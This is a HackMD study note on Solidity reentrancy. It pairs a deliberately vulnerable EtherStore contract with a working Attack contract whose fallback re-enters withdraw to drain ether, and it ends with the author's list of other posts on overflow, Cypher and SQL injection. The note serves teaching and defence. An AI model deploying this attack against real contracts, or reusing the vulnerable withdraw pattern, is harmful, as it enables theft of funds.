# Smart Contract Security Studies - Reentrancy Attack Summary This vulnerability occurs when a contract interacts with an external contract before modifying it's own local state variables. Which can sometimes be taken advantage of by placing a malicious fallback() function in the receiving contract. ![](https://i.imgur.com/pqJ3Bcf.png) ```solidity // SPDX-License-Identifier: MIT pragma solidity ^0.8.10; // VICTIM CONTRACT contract EtherStore { mapping(address => uint) public balances; function deposit() public payable { balances[msg.sender] += msg.value; // set the balance of the sender to whatever the sender sent } function withdraw() public { // (step 3 & 5 of diagram) uint bal = balances[msg.sender]; require(bal > 0); // make sure balance is above 0 (bool sent, ) = msg.sender.call{value: bal}(""); // Send eth to the person calling withdraw require(sent, "Failed to send Ether"); balances[msg.sender] = 0; // finally set balance of sender to 0 } // Helper function to check the balance of this contract function getBalance() public view returns (uint) { return address(this).balance; // return the balance of the contract } } ``` ```solidity // SPDX-License-Identifier: MIT pragma solidity ^0.8.10; // ATTACKING CONTRACT contract Attack { EtherStore public etherStore; constructor(address _etherStoreAddress) { etherStore = EtherStore(_etherStoreAddress); } // fallback() is called when eth is sent to this contract, as no other function identifier or data has been specified on behalf of the victim contract fallback() external payable { // fallback function calls the withdraw function again - note that this is called before the victim contract reaches the `balances[msg.sender] = 0;` code, meaning the victim contract won't properly update the attackers balance, and the attacker will be able to steal more eth than what's expected (step 4 of the diagram) if (address(etherStore).balance >= 1 ether) { etherStore.withdraw(); // re-call the vulnerable function } } function attack() external payable { require(msg.value >= 1 ether); etherStore.deposit{value: 1 ether}(); // initiate the attack by depositing 1 eth (see step one of diagram) etherStore.withdraw(); // immediately withdraw 1 eth from the victim contract, triggering the reentrance attack. (step 2 of diagram) } // Helper function to check the balance of this contract function getBalance() public view returns (uint) { return address(this).balance; } } ``` ### Resources: - https://www.youtube.com/watch?v=4Mm3BCyHtDY - https://consensys.github.io/smart-contract-best-practices/attacks/reentrancy/
Last changed by  
Chivato Cyber Security enthusiast and CTF addict studying / working from London.
293

Read more

BAJ Exercise (Analysing engagement rings) - Slides (focus on posie rings)

Which examples have you been given? Middle Ages Fede Rings Pose Rings Acrostic Jewellery 19th Century Identify the historic period they were created and which country they were used in. They were popular during the 15th through the 17th centuries. Is there a narrative behind the pieces? Any hidden meanings or messages?

9/15/2022
Smart Contract Security Studies - Overflow and Underflow attacks.

Similar to traditional buffer overflow attacks, in solidity, when variables are defined to be the legacy solidity uint type (and not the safe math version from OpenZeppelin), they can be overflown or underflown to reach unintended conclusions or chunks of code. Note: Only applicable to Solidity < 0.8, as Solidity >= 0.8 will default to an error Vulnerable Contract In the contract below the lockTime variable can be maliciously manipulated to allow an attacker to immediately withdraw funds, when they should only be able to after a week (see below): // The following happens upon depositing any amount into the vulnerable contract. lockTime[msg.sender] = block.timestamp + 1 weeks;

2/7/2022
Fun with Cypher Injections

I recently found a vulnerability type which had been massively under-researched within the public domain. Leaving one, maybe two genuinely interesting research posts. In an attempt to fill a void I dove into a neo4j, which uses cypher queries. Many security specialists will recognise neo4j from the popular AD hacking tool "blood hound". Note that this post is a WIP, and the more I find, the more I'll add. Tips / Tricks Overwriting values in CREATE clauses CREATE clauses in neo4j can have values overwritten if we can inject after it's initial definition. What this means is, if the query creates an "account" object with an "admin" key that is defined before our injection point, we can overwrite it to True to make our account an administrator.

12/24/2021
Basic SQL Injection @hacking

English Slide one SQL Injection is a server-side vulnerability that occurs when user input is inserted into a query, without any kind of validation or sanitization. The query is then passed to a database. The fact that the user controls a certain part of the query with no limitations, other than the location of the injection point, means they can prematurely end the string where the user input goes, and modify the query that is run on the database (see next slide for example). Slide two A basic example would be the following. Imagine there is a login form where the query selects the password from the database that matches the username:

12/19/2021
Read more from Chivato
Published on HackMD